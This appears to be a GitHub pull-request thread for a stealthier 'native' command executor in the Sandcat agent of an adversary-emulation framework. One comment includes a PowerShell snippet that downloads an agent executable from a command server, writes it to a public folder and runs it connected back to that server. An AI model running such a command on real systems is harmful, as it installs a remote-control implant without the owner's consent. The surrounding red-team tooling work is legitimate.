uruwhy
commented
2 years ago Had success when running a hand built sandcat agent, after copying in native files from
gocat-extensions. However, I don't see a way to get it to include these when built through the server. @uruwhy Wouldnativeneed to be added to the variation dict insand_svc.py? Something like:gocat_variants = dict( basic=set(), red=set(['gist', 'shared', 'shells', 'shellcode', 'native']) ) default_gocat_variant = 'basic'
Ah, so when you want to compile an agent with a particular extension, you pass in the gocat-extensions HTTP header, and the corresponding header will have the extension name (e.g. native). If you want multiple extensions, you can pass in a comma-separated string as the HTTP header value. The sandcat plugin service will handle copying the required files, compiling the agent, and then removing the copied files for you.
E.g.
$url="http://192.168.137.1:8888/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","native"); # this is where you specify the extension
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat.exe -server http://192.168.137.1:8888 -v;
sonarcloud[bot]
Description
Native executor for Sandcat agent - rather than rely on pre-existing executables or using psh/sh/cmd, create an extension that uses native golang functions to execute commands. The native executor will support a variety of commands, such as listing directories, listing processes, etc. This will provide added stealth by avoiding spawning unnecessary processes.
Type of change
How Has This Been Tested?
Tested on Mac, Linux, and Windows - ran an agent with the native executor and ran a simple operation to list directories via native golang.
Checklist: